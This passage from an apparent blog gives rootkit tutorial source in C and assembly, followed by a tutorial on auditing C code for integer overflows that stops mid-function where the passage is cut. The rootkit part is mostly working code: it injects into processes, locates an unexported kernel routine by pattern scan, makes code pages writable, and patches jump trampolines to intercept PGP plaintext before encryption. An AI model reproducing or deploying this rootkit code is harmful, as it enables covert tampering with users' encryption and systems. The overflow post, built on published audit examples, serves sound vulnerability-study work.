In your injected code you can do pretty much anything, as long as you make the required library and API functions available in the process’s memory. Here, in our BeforeOriginalFunction, we process the buffer before encryption and return a value that decides whether the original hooked function runs or not:

///////////////////////////////////////////////////////////////

DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

                if( hookIndex == USERHOOK_beforeEncode )

                {

                                return beforeEncode( originalStack, returnParameter, callData );

                }

                // other hooks can be handled here

                return (DWORD)TRUE;

}

 

// this function is located in the PGP SDK

// dynamic link library (old=PGP_SDK.DLL, new=PGPsdk.dll)

// This function accepts the callers input and output,

// which may be memory or file based, and converts the input

// into encrypted output

//

// return TRUE to allow encryption

// return FALSE to block encryption

///////////////////////////////////////////////////////////////

DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData )

{

                void*                                                                     contextPtr = (void*)stack[1]; // stack[0] is return address so the stack[1] is first parameter

                PGPOptionList*                                                optionListPtr = (PGPOptionList*)stack[2]; // second parameter of original Encode function

                DWORD                                                                                dwRet = (DWORD)TRUE;

 

                int index;

                int inputType = 0;

                void* lpBuffer;

                DWORD dwInBufferLen = 0;

                PGPOption* currentOption = optionListPtr->options;

                PFLFileSpec* fileSpec;

 

                // Look at the options in the option list

                for( index = 0; index < optionListPtr->numOptions; index++)

                {

                                if( currentOption->type == 1 )

                                {

                                                // File Input

                                                inputType = 1;

                                                fileSpec = (PFLFileSpec*)currentOption->value;

                                                lpBuffer = fileSpec->data;

                                                dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer)); // pCallData is the structure passed in by the detour; process-inject defines it in the data section

                                                break;

                                }

                                else if( currentOption->type == 2 )

                                {

                                                // Buffer Input

                                                inputType = 2;

                                                lpBuffer = (void*)currentOption->value;

                                                dwInBufferLen = (DWORD)currentOption->valueSize;

                                                break;

                                }

                                currentOption++;

                }

 

                // Process buffer or file before encryption -- for now do nothing --

                if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))

                {                                             

                                // just blocking this API to show functionality

                                dwRet = (DWORD)FALSE;

                                *callbackReturn = PGP_BAD_API;

                }

                return dwRet;

}
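
The option scan in beforeEncode is a linear search over tagged records that stops at the first input option. A minimal sketch of that pattern with a simplified, hypothetical record type (ToyOption is not the real PGPOption layout; only the type values 1 and 2 are taken from the listing):

```c
#include <stddef.h>

/* Hypothetical, simplified option record. */
typedef struct {
    int type;            /* 1 = file input, 2 = buffer input, as in the listing */
    const void *value;
    size_t valueSize;
} ToyOption;

/* Return the first file or buffer input option, or NULL if there is none. */
const ToyOption *toy_first_input(const ToyOption *options, size_t count)
{
    size_t i;
    for (i = 0; i < count; i++) {
        if (options[i].type == 1 || options[i].type == 2)
            return &options[i];
    }
    return NULL;
}
```

Returning a pointer to the record keeps the decision about what to do with the input separate from the search itself.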

 

AfterOriginalFunction does nothing; it is there only to show that you can run code after the hooked function:

void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

}

 

OK, now that you understand what happens after hooking, it is time to see how we place the hook. We need to:

  • Copy our custom code (HookTable, references to the library functions, DetourFunction, etc.) to the process’s memory
  • Overwrite the first instruction of the hooked function with a jump opcode followed by the address of the beginning of our injected code in the process’s memory
  • Copy that first instruction into the HookTable and place a jump after it, back to the second instruction of the original hooked function
  • Copy the parameters passed from the hooked ZwMapViewOfSection to the HookTable

Copying the first instruction may seem simple, but in fact it is not. To understand the issue you should be familiar with the x86 instruction set. Opcodes do not all have the same length, and depending on the opcode you must also copy the bytes that follow it (for example, the source and destination operands of a mov instruction). I skip the details of the transferInstruction function, which does the low-level work; if you’re interested you can download the source code from the mentioned address and look at the file Parse86.h. For now, here is just the high-level function getx86Instruction:

ULONG getx86Instruction( PCHAR originalCode, PCHAR instructionBuffer, ULONG bufferLength ) // copies whole instructions from originalCode until at least 5 bytes have been copied, and returns the number of bytes copied

{

                PBYTE source = NULL;

                PBYTE destination = NULL;

                ULONG ulCopied = 0;

                PBYTE jumpAddress = NULL;

                LONG  extra = 0;

 

                memset( instructionBuffer, 0, bufferLength );

                source = (PBYTE)originalCode;

                destination = (PBYTE)instructionBuffer;

                jumpAddress = NULL;

                extra = 0;

                // start with 5 bytes

                for( ulCopied = 0; ulCopied < 5; ) // 5 because a jmp can be 5 bytes long; reaching 5 bytes may mean copying more than one instruction

                {

                                source = transferInstruction( destination, source, &jumpAddress, &extra ); // this function checks the opcode, copies one whole instruction to destination and returns source plus the number of bytes copied. It also sets jumpAddress for jump instructions, but neither jumpAddress nor extra is used here

                                if( !source )

                                {

                                                memset( instructionBuffer, 0, bufferLength );

                                                ulCopied = 0;

                                                break;

                                }

                                ulCopied = (DWORD)source - (DWORD)originalCode; // total number of bytes copied so far; the loop stops as soon as this reaches 5

                                if( ulCopied >= bufferLength )

                                {

                                                ASSERT( FALSE );

                                                break;

                                }

                                destination = (PBYTE)instructionBuffer + ulCopied;

                }

                return ulCopied;

}
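
The loop in getx86Instruction only ever copies whole instructions, so the number of bytes moved can be larger than the 5 bytes that will be overwritten. A minimal sketch of that rule, assuming the instruction lengths are already known (in the real code transferInstruction works them out; toy_bytes_to_copy and its parameters are hypothetical):

```c
#include <stddef.h>

/* lengths[i] is the byte length of the i-th instruction at the start of the
   function. Returns the number of bytes to copy so that at least patchSize
   bytes are covered, or 0 if the listed instructions are too short. */
size_t toy_bytes_to_copy(const size_t *lengths, size_t count, size_t patchSize)
{
    size_t copied = 0;
    size_t i;
    for (i = 0; i < count && copied < patchSize; i++)
        copied += lengths[i]; /* always take a whole instruction */
    return copied >= patchSize ? copied : 0;
}
```

For instructions of 2, 1 and 3 bytes and a 5-byte patch, all three instructions are taken and 6 bytes are copied, because stopping after 3 bytes would leave the patch overlapping half an instruction.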

 

Changing the first instruction of the original function is not easy either, because the memory containing that instruction is write-protected. We have to use ZwProtectVirtualMemory, an undocumented kernel function that can make a portion of memory writable. Starting from the documented function ZwPulseEvent, we search for ZwProtectVirtualMemory and then use it to make the original function writable:

typedef NTSTATUS (NTAPI *ZWPROTECTVIRTUALMEMORY)( // function pointer type for ZwProtectVirtualMemory

  IN HANDLE               ProcessHandle,

  IN OUT PVOID            *BaseAddress,

  IN OUT PULONG           NumberOfBytesToProtect,

  IN ULONG                NewAccessProtection,

  OUT PULONG              OldAccessProtection );

ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory;

…

OldZwProtectVirtualMemory = findUnresolved(ZwPulseEvent);

…

PVOID findUnresolved( PVOID pFunc )

{

                UCHAR pattern[5] = { 0 };

                PUCHAR               bytePtr = NULL;

                PULONG  oldStart = 0;

                ULONG newStart = 0;

 

                memcpy( pattern, pFunc, 5 ); // copy first 5 bytes of function ZwPulseEvent

 

                // subtract offset

                oldStart = (PULONG)&(pattern[1]);

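                newStart = *oldStart - 1; // bytes 1 to 4 of the pattern hold a 32-bit value (in a Zw stub this is the operand of the initial mov eax, the service number); decreasing it by one gives the first 5 bytes expected for the function numbered just below ZwPulseEvent, which this code assumes is ZwProtectVirtualMemory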

                *oldStart = newStart;

 

                // Search for pattern

                for( bytePtr = (PUCHAR)pFunc - 5; bytePtr >= (PUCHAR)pFunc - 0x800; bytePtr-- ) // search backward from ZwPulseEvent to 2KB (0x800) before it

                                if( checkPattern( bytePtr, pattern, 5 ) == 0 ) // compare the 5 bytes at bytePtr with the pattern; stepping back one byte at a time covers every 5-byte window in the 2KB before ZwPulseEvent

                                                return (PVOID)bytePtr;

                // pattern not found

                return NULL;

}

BOOL makeWritable( PVOID address, ULONG size )

{

    NTSTATUS       status;

                ULONG                 pageAccess;

                ULONG                 ZwProtectArray[3] = { 0 };

 

                pageAccess = PAGE_EXECUTE_READWRITE;

                ZwProtectArray[0] = (ULONG)address; // address of the function to make writable; this is important because we need to tamper with the hooked function and also the hook table

                ZwProtectArray[1] = size;

                ZwProtectArray[2] = 0;

 

                status = OldZwProtectVirtualMemory( (HANDLE)-1, //although this function is not exported, we found its address in memory and defined its prototype so now we can use it

                                                                                                                                                                (PVOID *)(&(ZwProtectArray[0])),

                                                                                                                                                                &(ZwProtectArray[1]), // this parameter is in

                                                                                                                                                                pageAccess, //PAGE_EXECUTE_READWRITE

                                                                                                                                                                &(ZwProtectArray[2]) ); // this parameter is out

 

                if( !NT_SUCCESS( status ) )

                                return FALSE;

 

                return TRUE;

}

 

Now that we have all the tools we need, see the processInject code:

BOOL processInject( CALL_DATA_STRUCT* pCallData, int hooks, PCHAR pMemory )

{

                int           loop;

                int           offsetToPattern;

                PCHAR pNewTable;

                PCHAR pNewCode;

                IN_PROCESS_DATA* pNewData;

                PCHAR pOldTable;

                PCHAR pOldCode;

                PCHAR pOldData;

                DWORD tableLength;

                DWORD tableOffset;

                PCHAR callDataOffset;

 

                if( !kernel32Base )

                                return FALSE;

 

                if( !getHookPointers( pMemory, &pNewTable, &pNewCode, (PCHAR*)&pNewData ) )

                                return FALSE;

// To call the library functions we need, we must map their addresses, because they are not guaranteed to be present in the caller process. We use GetFunctionAddress (remember that hooking is now set up, so we have access to this and the other functions we defined) to locate the library functions and store them in the IN_PROCESS_DATA structure

                pNewData->pOutputDebugStringA = (PROTOTYPE_OutputDebugStringA)GetFunctionAddress( kernel32Base, "OutputDebugStringA", NULL, 0 );

                pNewData->pOutputDebugStringW = (PROTOTYPE_OutputDebugStringW)GetFunctionAddress( kernel32Base, "OutputDebugStringW", NULL, 0 );

                pNewData->pCloseHandle = (PROTOTYPE_CloseHandle)GetFunctionAddress( kernel32Base, "CloseHandle", NULL, 0 );

                pNewData->pSleep = (PROTOTYPE_Sleep)GetFunctionAddress( kernel32Base, "Sleep", NULL, 0 );

                pNewData->pCreateFileW = (PROTOTYPE_CreateFileW)GetFunctionAddress( kernel32Base, "CreateFileW", NULL, 0 );

                pNewData->plstrlenA = (PROTOTYPE_lstrlenA)GetFunctionAddress( kernel32Base, "lstrlenA", NULL, 0 );

                pNewData->plstrlenW = (PROTOTYPE_lstrlenW)GetFunctionAddress( kernel32Base, "lstrlenW", NULL, 0 );

                pNewData->plstrcpynA = (PROTOTYPE_lstrcpynA)GetFunctionAddress( kernel32Base, "lstrcpynA", NULL, 0 );

                pNewData->plstrcpynW = (PROTOTYPE_lstrcpynW)GetFunctionAddress( kernel32Base, "lstrcpynW", NULL, 0 );

                pNewData->plstrcpyA = (PROTOTYPE_lstrcpyA)GetFunctionAddress( kernel32Base, "lstrcpyA", NULL, 0 );

                pNewData->plstrcpyW = (PROTOTYPE_lstrcpyW)GetFunctionAddress( kernel32Base, "lstrcpyW", NULL, 0 );

                pNewData->plstrcmpiA = (PROTOTYPE_lstrcmpiA)GetFunctionAddress( kernel32Base, "lstrcmpiA", NULL, 0 );

                pNewData->plstrcmpiW = (PROTOTYPE_lstrcmpiW)GetFunctionAddress( kernel32Base, "lstrcmpiW", NULL, 0 );

                pNewData->plstrcmpA = (PROTOTYPE_lstrcmpA)GetFunctionAddress( kernel32Base, "lstrcmpA", NULL, 0 );

                pNewData->plstrcmpW = (PROTOTYPE_lstrcmpW)GetFunctionAddress( kernel32Base, "lstrcmpW", NULL, 0 );

                pNewData->plstrcatA = (PROTOTYPE_lstrcatA)GetFunctionAddress( kernel32Base, "lstrcatA", NULL, 0 );

                pNewData->plstrcatW = (PROTOTYPE_lstrcatW)GetFunctionAddress( kernel32Base, "lstrcatW", NULL, 0 );

                sprintf( pNewData->debugString, "This is a string contained in injected memory\n" );

 

                __asm

                {

                                lea eax, HookTable

                                mov pOldTable, eax

                                lea eax, DetourFunction

                                mov pOldCode, eax

                                lea eax, EndOfInjectedCode

                                mov pOldData, eax

                }

 

                memcpy( pNewCode, pOldCode, pOldData - pOldCode ); // write the detour function into the code section of the memory allocated in the process space

                tableLength = pOldCode - pOldTable;

                for( loop = 0; loop < (int)tableLength - 4; loop ++ )

                {

                                if( *(PDWORD)(pOldTable+loop) == (DWORD)START_OF_TRAMPOLINE_PATTERN ) // search to find -1. in fact -1 is the first byte after phoney_jump in HookTable

                                {

                                                offsetToPattern = loop; // offset to phoney_jump

                                                break;

                                }

                }

                for( loop = 0; loop < hooks; loop ++ ) // for now it is just one hook, but as you can see this function can place several hooks for different functions

                {

                                tableOffset = tableLength * pCallData[loop].index; // according to potential of several hooks, it calculates table of current hook. for now it is just one table and actually is 0

                                callDataOffset =  pNewTable + tableOffset + offsetToPattern; //address of phoney_jump

                                memcpy( pNewTable + tableOffset, pOldTable, tableLength ); // write HookTable in table section of memory allocated in the process space

                                *((PDWORD)(callDataOffset + CALLDATA_INDEX_LOCATION)) = pCallData[loop].index; //in first 4 byte(on -1) it writes the index of hook for example USERHOOK_beforeEncode

                                *((PDWORD)(callDataOffset + CALLDATA_PARAMETERS_LOCATION)) = pCallData[loop].parameters;// in second 4 byte (actually 4 byte after phoney_jump) it writes number of parameters of original function

                                *((PDWORD)(callDataOffset + CALLDATA_CALLTYPE_LOCATION)) = pCallData[loop].callType; // in byte 8 to 12 it writes calltype like CDECL_TYPE

                                *((PDWORD)(callDataOffset + CALLDATA_STACK_OFFSET_LOCATION)) = pCallData[loop].stackOffset; // byte 12 to 16

                                INJECT_JUMP( callDataOffset + JUMP_TO_DETOUR_LOCATION, pNewCode ); // it modifies the jmp DetourFunction instruction before the -1 in HookTable so it points to the CALLER PROCESS's detour function (which is just copied)! note: the jmp instruction is 5 byte!

                                createTrampoline( pCallData[loop].hookFunction, // address of hooked function

                                                pNewTable + tableOffset, //Beginning of HookTable

                                                callDataOffset + TRAMPOLINE_LOCATION); // actually in first no-op of HookTable

                }

                return TRUE;

}

// Parse first instruction of original function.

// Replace first instruction with jump to hook.

// Save first instruction to trampoline function.

// Only call original function through trampoline.

BOOL isJump( PCHAR instruction, ULONG instructionLength )

{

                BYTE firstByte;

                BYTE secondByte;

                PCHAR thisInstruction;

                ULONG thisInstructionLength;

                ULONG nextInstructionLength;

                char instructionBuffer[MAX_INSTRUCTION] = { 0 };

 

                thisInstruction = instruction;

                thisInstructionLength = instructionLength;

                while( thisInstructionLength > 0 ) // because of the 5-byte limit in getx86Instruction there may be more than one instruction

                {

                                // check all jump op codes

                                firstByte = thisInstruction[0];

                                secondByte = thisInstruction[1];

                                if( IS_BETWEEN( firstByte, 0x70, 0x7f ) ) //this and following next lines checks all types of jump

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xca, 0xcb ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe0, 0xe3 ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe8, 0xeb ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xcf ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xf3 ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xff ) )

                                {

                                                if( secondByte == 0x15 || secondByte == 0x25 )

                                                                return TRUE;

                                                if( (secondByte & 0x38) == 0x10 || (secondByte & 0x38) == 0x18 ||

                                                                (secondByte & 0x38) == 0x20 || (secondByte & 0x38) == 0x28 )

                                                                return TRUE;

                                }

                                else if( IS_EQUAL( firstByte, 0x0f ) )

                                {

                                                if( IS_BETWEEN( secondByte, 0x80, 0x8f ) )

                                                                return TRUE;

                                }

                                memset( instructionBuffer, 0, sizeof(instructionBuffer) );

                                nextInstructionLength = getNextInstruction( thisInstruction, 1, instructionBuffer, MAX_INSTRUCTION );

                                if( nextInstructionLength <= 0 )

                                                break;

                                thisInstructionLength -= nextInstructionLength;

                                thisInstruction += nextInstructionLength;

                }

                return FALSE;

}

#define INJECT_JUMP( from, to ) { ((PCHAR)(from))[0] = (CHAR)0xe9; *((DWORD *)&(((PCHAR)(from))[1])) = (PCHAR)(to) - (PCHAR)(from) - 5; } // - 5 accounts for the size of the jump instruction itself (read it as to - (from + 5)), since the jmp displacement is counted from the byte after the instruction

BOOL createTrampoline( PCHAR originalAddress, PCHAR tableAddress, PCHAR trampolineAddress )

{

                ULONG                 newOriginalAddress = 0;

                char                       instruction[MAX_INSTRUCTION] = { 0 }; //MAX_INSTRUCTION is 36

                ULONG                 instructionLength;

 

                instructionLength = getx86Instruction( originalAddress, instruction, sizeof(instruction) );

                newOriginalAddress = (ULONG)(originalAddress + instructionLength);

                // see if it's a jump

                if( isJump( instruction, instructionLength ) ) //here all types of jump will be examined

                {

                                PVOID pOldDstAddr = (PVOID)(GET_JUMP( instruction )); // but here just 0xe9 jump is acceptable and in case of other jumps 0 is returned and createTrampoline function returns false since cases like call can not be handled in our detour function

                                if( pOldDstAddr )

                                {

                                                // If first instruction of original function

                                                // is a jump, trampoline instruction is NO-OP

                                                // and jump target is original jump target

                                                memset( instruction, 0x90, sizeof(instruction) );

                                                instructionLength = 0;

                                                newOriginalAddress = (ULONG)pOldDstAddr; //Keeping track of jump address for return(after executing first instruction and do our evil things)

                                }

                                else

                                {

                                                return FALSE;

                                }

                } // up to here we have done 2 jobs. first we have found the instruction ( instruction variable ) to be placed in HookTable phoney_call place ( either the first instruction of original function or the no-op instruction ) and second we found the address (newOriginalAddress variable) to return after our beforeEncode function ( either address after the first instruction or in case of jump the address of jump)

                if( makeWritable( (PVOID)trampolineAddress, MAX_INSTRUCTION + 5 ) ) // this function makes the memory writable by means of an un-exported function

                {

                                // write trampoline function

                                memset( trampolineAddress, 0x90, MAX_INSTRUCTION + 5 ); // + 5 covers the jmp EndOfInjectedCode; that jump is useless since we reach EndOfInjectedCode by pushing its address on top of the stack, so it can be replaced by no-ops

                                memcpy( trampolineAddress, instruction, instructionLength ); // set the first instruction of original function in the HookTable

                                INJECT_JUMP( trampolineAddress + instructionLength, newOriginalAddress ); //set the jmp to the original function in the HookTable

                                // set original function to jump to trampoline function

                                if( makeWritable( originalAddress, instructionLength + 5 ) ) //to be cautious we make 5 bytes more writable

                                {

                                                INJECT_JUMP( originalAddress, tableAddress ); //here we inject jmp to our HookTable address in original function

                                                return TRUE;

                                }

                }

                return FALSE;

}

After getHookPointers retrieves the addresses of the code regions in the calling process, we store references to the required kernel32 library functions in the IN_PROCESS_DATA structure (remember that we cannot simply call these functions, because we do not know whether the calling process holds references to them). The __asm block then captures the addresses, inside OUR code (the rootkit), of the pieces to be injected, so that they can be copied to their destinations in the calling process. Finally, the loop over the hooks writes into each HookTable the parameters supplied by the kernel hook (the values needed to adjust the stack, passed from the hooked ZwMapViewOfSection), the original function's first instruction, and the jump back to the second instruction, taking into account that several functions may be hooked.
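The displacement arithmetic behind INJECT_JUMP can be sketched in portable C. The helper below is hypothetical (encode_jmp_rel32 is not part of the rootkit source); it writes the 5-byte jmp rel32 encoding into an ordinary byte buffer and takes plain 32-bit integers as addresses, so it can be tried without touching executable memory. It assumes a 32-bit x86 target, as the macro does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define JMP_REL32_SIZE 5u   /* 1 opcode byte (0xE9) + 4 displacement bytes */

/* Hypothetical helper: encode "jmp to" as it would appear at address `from`.
 * The CPU adds the displacement to the address of the NEXT instruction,
 * which is why the size of the jump itself (5) is subtracted. */
static void encode_jmp_rel32(uint8_t *out, uint32_t from, uint32_t to)
{
    uint32_t rel = to - (from + JMP_REL32_SIZE);   /* wraps modulo 2^32 */

    assert(out != NULL);
    out[0] = 0xE9;
    /* x86 stores the displacement least significant byte first */
    out[1] = (uint8_t)(rel & 0xFFu);
    out[2] = (uint8_t)((rel >> 8) & 0xFFu);
    out[3] = (uint8_t)((rel >> 16) & 0xFFu);
    out[4] = (uint8_t)((rel >> 24) & 0xFFu);
}
```

For a jump placed at 0x1000 that targets 0x2000 the displacement is 0x2000 - 0x1005 = 0xFFB; for the backward jump from 0x2000 to 0x1000 it is 0xFFFFEFFB, which is the same subtraction wrapped to 32 bits.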

Published in Rootkit development

integer overflow c | buffer overflow in c | buffer overflow example

C gives the developer full control over memory management, and because of this buffer overflows are very common. Whether the cause is the use of unsafe functions or a developer's mistake in calculating the length of a buffer, the damage is the same. Most buffer overflow vulnerabilities stem from a wrong calculation of a buffer length or an offset. These issues are rooted in characteristics of C's integer types that often remain hidden from developers. A professional code auditor should be able to detect such logic flaws, which are sometimes complex. In this article I first discuss the root causes of buffer overflows (mainly those related to integers) and then provide several source code examples.

Most novice hackers are familiar with the term buffer overflow. A naïve view, however, is that developers' use of unsafe functions such as strcpy is the main cause of such vulnerabilities. Perhaps 15 years ago this view was right, but over time code has become more secure and hackers have found new ways to leverage a bug. In recent years a great number of vulnerabilities have been complex logic flaws related to integer overflows, integer boundary issues and integer conversions. These issues are vulnerabilities because they directly cause a buffer overflow.

After reviewing the vulnerabilities introduced in this article you will probably know how an attacker leverages an integer issue such as an integer overflow. If you are looking for preconditions, here are a few conditions that together may lead to a vulnerability:

  • A buffer is allocated, either dynamically (from the heap using malloc) or with a fixed size (on the stack through a variable definition)
  • User-controllable input is read into the buffer
  • The amount of memory to allocate or the size of the data to copy is calculated (either from a length value supplied by the user or implicitly in the code)

The real issue is that the count passed to the copy operation (for example the length argument of memset or memcpy) is larger than the size of the buffer, or that the size argument of malloc is smaller than the amount really needed. The first two conditions are common to all memory management modules and you should have spotted them in your pre-assessment phase. Of all the memory management modules, those that meet the third condition are the better place to start because they are likely to have integer overflow issues. For example, a simple length + 1 addition may be all it takes to cause a buffer overflow.

Integer overflow c

An integer overflow leads either to a negative number or to a much smaller number. Integer overflows are not vulnerabilities by themselves, but most of the time they result in a buffer overflow because the calculation for the buffer allocation becomes incorrect. As a first example, let's examine a buffer overflow in OpenSSL 0.9.6l caused by a simple addition (the code is taken from the book The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities):

The Art of Software Security Assessment (Listing 6-6)

 

c.inf=ASN1_get_object(&(c.p),&(c.slen),&(c.tag),&(c.xclass),

                      len-off);

 

...

{

    /* suck in c.slen bytes of data */

    want=(int)c.slen;

    if (want > (len-off))

    {

        want-=(len-off);

        if (!BUF_MEM_grow(b,len+want))

        {

            ASN1err(ASN1_F_ASN1_D2I_BIO,

                    ERR_R_MALLOC_FAILURE);

            goto err;

        }

        i=BIO_read(in,&(b->data[len]),want);

 

To see the vulnerability, consider c.slen to be 2147483647, len = 200 (the number of bytes already read) and off = 50 (the number of bytes already parsed). The first if statement passes because 2147483647 > 150, and want becomes 2147483647 - 150 = 2147483497. The call to BUF_MEM_grow does not grow the buffer, because len + want overflows to -2147483599, and the final BIO_read then writes up to 2147483497 bytes into the buffer!
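One way to guard an addition such as len + want is to test against INT_MAX before adding. The function below is a minimal sketch, not OpenSSL code; the name checked_add_nonneg is hypothetical, and it assumes that both operands are meant to be non-negative sizes.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

/* Hypothetical helper: stores len + want in *sum and returns 1,
 * or returns 0 when the operands are invalid or the sum would
 * not fit in an int. The addition is only performed when safe. */
static int checked_add_nonneg(int len, int want, int *sum)
{
    assert(sum != NULL);
    if (len < 0 || want < 0)
        return 0;               /* negative sizes are never valid here */
    if (want > INT_MAX - len)
        return 0;               /* len + want would exceed INT_MAX */
    *sum = len + want;
    return 1;
}
```

A caller would refuse to grow the buffer (and refuse to read) whenever the helper returns 0, instead of passing a wrapped value on.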

Although a simple addition of two big numbers can cause an integer overflow, addition is not the only cause; multiplication is another source of integer overflows. In C, dynamic allocation is done with the malloc function, which takes the number of bytes to allocate as its parameter. To calculate that size, developers use:

bufferSize = length * [Type’s size]

If all of the variables are 32-bit integers and the user is able to specify a large length value, this multiplication can cause an integer overflow. Consider a network packet that contains a header field indicating the length. If the user specifies 1073741825 for this length on a 32-bit system where the element type is a 4-byte int32, the multiplication overflows: 1073741825 * 4 = 4294967300, which wraps to 4. This probably leads to a buffer overflow vulnerability, because bufferSize is 4 and malloc allocates only 4 bytes, while the packet reader still uses the length value and writes 1073741825 elements of 4 bytes each into a buffer that holds just one! A huge buffer overflow!
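The wrap-around in the size calculation, and one common way to avoid it, can be sketched as follows. Both function names are hypothetical; the guard divides the maximum size by the element size before multiplying, so the multiplication is only performed when it cannot wrap.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* What a 32-bit size calculation actually yields: unsigned arithmetic
 * wraps modulo 2^32, so a large count can produce a tiny size. */
static uint32_t wrapped_size32(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;
}

/* Hypothetical safe allocator: returns NULL instead of allocating
 * when count * elem_size does not fit in size_t. */
static void *alloc_array(size_t count, size_t elem_size)
{
    assert(elem_size != 0);
    if (count > SIZE_MAX / elem_size)
        return NULL;
    return malloc(count * elem_size);
}
```

With the values from the text, wrapped_size32(1073741825, 4) evaluates to 4, which is exactly the undersized allocation described above.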

Integer Conversion issues

A conversion between types can be the result of either an explicit conversion or an implicit compiler conversion hidden from the developer's eyes. Explicit conversion vulnerabilities are mainly the result of assigning a smaller signed integer (such as a short) to an unsigned int. In this scenario a negative number such as -1 becomes the biggest unsigned int, and the allocated memory ends up much smaller than the write operation. Another common explicit conversion is from an unsigned integer to its signed counterpart. In this case a big number becomes a negative number and will probably bypass the boundary length check that follows. Implicit conversions mostly happen during operations; in fact every type smaller than int is promoted to int in arithmetic operations. A typical issue arises when an int and an unsigned int take part in the same arithmetic operation: the int is automatically converted to unsigned int. This is exactly why supposedly safe functions such as snprintf(), strncpy(), memcpy(), read(), or strncat() are not safe at all in certain situations. These functions accept an unsigned type (size_t) as the “n” parameter, so a negative number passed to them ends up as a very large positive number.

Always remember that char and short types can be negative, so passing them as arguments to functions that work with size_t can lead to a vulnerability. Look at a buffer overflow example from the AntiSniff tool vulnerability published on Packet Storm Security:
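The conversions described above can be observed with a few small functions. This is only an illustrative sketch with hypothetical names; each function isolates one conversion so its result can be inspected on its own.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* A short assigned to an unsigned int is sign-extended first,
 * so -1 turns into UINT_MAX rather than 65535. */
static unsigned int widen_to_unsigned(short value)
{
    return (unsigned int)value;
}

/* A purely signed bound check: any negative length passes it. */
static int passes_signed_check(int len, int limit)
{
    assert(limit >= 0);
    return len <= limit;
}

/* What a function with a size_t parameter receives for that length. */
static size_t as_copy_length(int len)
{
    return (size_t)len;
}

/* Spells out the conversion the compiler applies implicitly to
 * "a < b" when a is an int and b is an unsigned int. */
static int mixed_less_than(int a, unsigned int b)
{
    return (unsigned int)a < b;
}
```

A length of -1 therefore passes a signed check against 1024, yet reaches the copy function as the largest possible size_t, and it is not considered smaller than 16 once it is compared against an unsigned value.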

The Art of Software Security Assessment (adapted from listing 6-8)
  char *indx;
  unsigned int count;
  char nameStr[MAX_LEN]; //256
...
  memset(nameStr, '\0', sizeof(nameStr));
...
  indx = (char *)(pkt + rr_offset);
  count = (char)*indx;

  while (count){
    if (strlen(nameStr) + count < ( MAX_LEN - 1) ){
      (char *)indx++;
      strncat(nameStr, (char *)indx, count);
      indx += count;
      count = (char)*indx;
      strncat(nameStr, ".",
              sizeof(nameStr) - strlen(nameStr));
    } else {
      fprintf(stderr, "Alert! Someone is attempting "
                      "to send LONG DNS packets\n");
      count = 0;
    }

 }
 nameStr[strlen(nameStr)-1] = '\0';

 

Here count is an unsigned int, which is correct, and indx is used to read characters, including the length byte of the next block. indx is a char pointer and that seems to make sense, right? Well, it does not, because char is signed (on most platforms) and an attacker can supply a length byte of -1 (0xFF). When count = (char)*indx is evaluated, the -1 is converted to the largest 32-bit unsigned integer, so the while condition passes. The if statement is supposed to prevent a buffer overflow, but because a small number (strlen(nameStr)) is added to a huge one (count), an integer overflow takes place, the result is less than MAX_LEN - 1, and control flows to the first strncat call. There the huge count is passed as the length argument and a buffer overflow happens. The if statement was added as an enhancement over the previous vulnerable version, which had no protection mechanism at all. But as you can see, the real problem is the conversion of a signed byte to an unsigned integer. Declaring both nameStr and indx as unsigned char fixes the problem in this buffer overflow example.

When a value is converted from an unsigned type to the signed type of the same length, there is a good chance that an integer overflow vulnerability exists. In this case large lengths are seen as negative integers after the conversion and the boundary check that follows is easily bypassed. It is worth mentioning that many of these buffer overflow issues can be identified more easily by fuzz testing than by source code analysis. For example, let's examine the following piece of code:

The Art of Software Security Assessment (Listing 6-12)

 

unsigned short read_length(int sockfd)

{

    unsigned short len;

 

    if(full_read(sockfd, (void *)&len, 2) != 2)

        die("could not read length!\n");

 

    return ntohs(len);

}

 

int read_packet(int sockfd)

{

    struct header hdr;

    short length;

    char *buffer;

 

    length = read_length(sockfd);

 

    if(length > 1024){

        error("read_packet: length too large: %d\n", length);

        return 1;

    }

 

    buffer = (char *)malloc(length+1);

    if((n = read(sockfd, buffer, length)) < 0){

        error("read: %m");

        free(buffer);

        return 1;

    }

 

    buffer[n] = '\0';

 

    return 0;

}

 

In read_packet, the assignment length = read_length(sockfd) converts an unsigned short to a signed short, which turns a big number like 65535 into a negative one (-1), and therefore the length > 1024 check is bypassed. After that, malloc is asked for 0 bytes, because length + 1 evaluates to 0. The read call then receives -1 as its size argument, which is converted to a huge size_t value, so data is written far past the end of the tiny buffer.

While auditing, it is important not to be put off by a complex algorithm and abandon it. One approach to overcoming the complexity is to go over the source code several times, pursuing just one goal in each iteration. To find integer conversion issues you should pay attention to the variable definitions and the assignments that follow for each variable. If you find an assignment in which the type of the right side differs from the type of the left side, you should check different test cases. Let's examine an integer overflow example from a vulnerability in SSH:
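The chain of conversions in read_packet can be reproduced in isolation. The sketch below uses hypothetical function names and assumes a 16-bit short; converting an out-of-range value to a signed type is implementation-defined, but mainstream compilers wrap it, which is the behavior the attack relies on.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_PACKET 1024

/* Mirrors the flawed assignment: a 16-bit wire length stored in a short. */
static short flawed_length(unsigned short wire_len)
{
    assert(sizeof(short) == 2);   /* the sketch assumes a 16-bit short */
    return (short)wire_len;
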